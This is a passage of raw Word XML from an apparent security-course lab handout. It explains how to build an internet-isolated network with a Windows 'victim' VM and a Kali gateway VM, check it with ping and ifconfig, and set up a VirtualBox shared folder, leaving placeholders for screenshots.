                                <w:spacing w:line="240" w:lineRule="auto"/>
                                <w:textDirection w:val="btLr"/>
                              </w:pPr>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="907049617" name="Text Box 907049617"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1042775" y="385175"/>
                            <a:ext cx="1933500" cy="657600"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00300449" w:rsidRDefault="00754143" w14:paraId="34A94949" w14:textId="77777777">
                              <w:pPr>
                                <w:spacing w:line="240" w:lineRule="auto"/>
                                <w:textDirection w:val="btLr"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="000000"/>
                                  <w:sz w:val="28"/>
                                </w:rPr>
                                <w:t>Virtual Network</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"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114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="5C9748F2" wp14:editId="7777777">
                <wp:extent cx="5619750" cy="1794301"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="540442525"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5619750" cy="1794301"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect"/>
                        <a:ln/>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="00300449" w14:paraId="00000026" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="1A0E472A" w14:paraId="00000027" w14:textId="5D530890">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This network will not be able to access the Internet. The Windows VM will act as a victim, and the Kali Linux VM will act as a network gateway to the victim machines. We will use this gateway to intercept the network traffic and to simulate various services such as DNS or HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="50AA42B1" w14:textId="15C832BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Follow the instructions in a separate document to configure both VMs to use an internal(-only) network, meaning the VMs can communicate with each other but not the outside world (i.e. the Internet).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="2ABE858F" w14:textId="7AEB187A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Confirm your network setup by including screenshots of the results of the following commands: “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” (Kali), “ipconfig” (Windows), successful “ping” commands from EACH machine to the other, and unsuccessful “ping” commands to IP address 8.8.8.8 .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="6905F354" w14:textId="654B518F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:hanging="0"/>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56350B6D" w14:textId="0B80565A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PASTE SCREENSHOTS HERE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="63A0F14C" w14:textId="2AD88DB4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="014D8E32" w14:textId="654B518F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:hanging="0"/>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405BE557" w14:textId="510464D4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="00300449" w14:paraId="00000041" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="1A6C870A" w14:paraId="00000042" w14:textId="5D3B9888">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Part 3: Setting up a shared folder between the Kali guest OS and the host OS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="00300449" w14:paraId="00000043" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="1A6C870A" w14:paraId="62CDD423" w14:textId="76BB2424">
      <w:pPr>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VirtualBox instructions follow; instructions for setting up a shared folder in Hyper-V, UTM, or another hypervisor should be similar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="1A6C870A" w14:paraId="00000044" w14:textId="2F1CCB97">
      <w:pPr>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="1A6C870A" w14:paraId="672CB758" w14:textId="3B03EF44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to ‘Machine-&gt;Settings-&gt;Shared Folders’ in the VirtualBox menu of your Kali VM. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="1A6C870A" w14:paraId="00000045" w14:textId="6F97E569">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Add a new shared folder, and:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="1A6C870A" w14:paraId="00000046" w14:textId="1D24A671">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Choose the host path of the shared folder in the ‘Folder Path’ field. This will be the path on your host device.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="1A6C870A" w14:paraId="00000047" w14:textId="184F35DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Name your new folder as “CSE434S-Kali-Shared” .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="1A6C870A" w14:paraId="00000048" w14:textId="681356C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Select both ‘Auto-mount’, and ‘Make Permanent’ .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="2B361AEC" w14:paraId="00000049" w14:textId="275C3511">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Name the guest folder name “CSE434S-share” in ‘Mount point’ field. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="1A6C870A" w14:paraId="0000004A" w14:textId="7D11AEEB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Open a terminal in the Kali VM, and go to /media/sf_CSE434S-share.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="1A0E472A" w14:paraId="0000004B" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>If you do not have access to the shared folder, try ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>adduser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> $USER </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vboxsf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">’ to add yourself to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vboxsf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> group. You may have to log out and log in again to see the changes. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="1A0E472A" w14:paraId="0000004C" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> file (you can use  the </w:t>
      </w:r>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">‘touch’ </w:t>
      </w:r>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">command)  and verify that you can see the file in your host machine. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="00300449" w14:paraId="0000004D" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="1A6C870A" w14:paraId="0000004E" w14:textId="6B51420E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Please take a screenshot of your created file as seen on both the Kali VM and the host machine and include the screenshots here.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="00300449" w14:paraId="1A37359A" w14:textId="654B518F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>===============================================</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="00300449" w14:paraId="649CA047" w14:textId="0B80565A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PASTE SCREENSHOTS HERE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="00300449" w14:paraId="50B7531A" w14:textId="2AD88DB4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="00300449" w14:paraId="3E84203A" w14:textId="654B518F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>===============================================</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="00300449" w14:paraId="0000004F" w14:textId="266CE79C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="00300449" w14:paraId="00000050" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="1A0E472A" w14:paraId="00000051" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
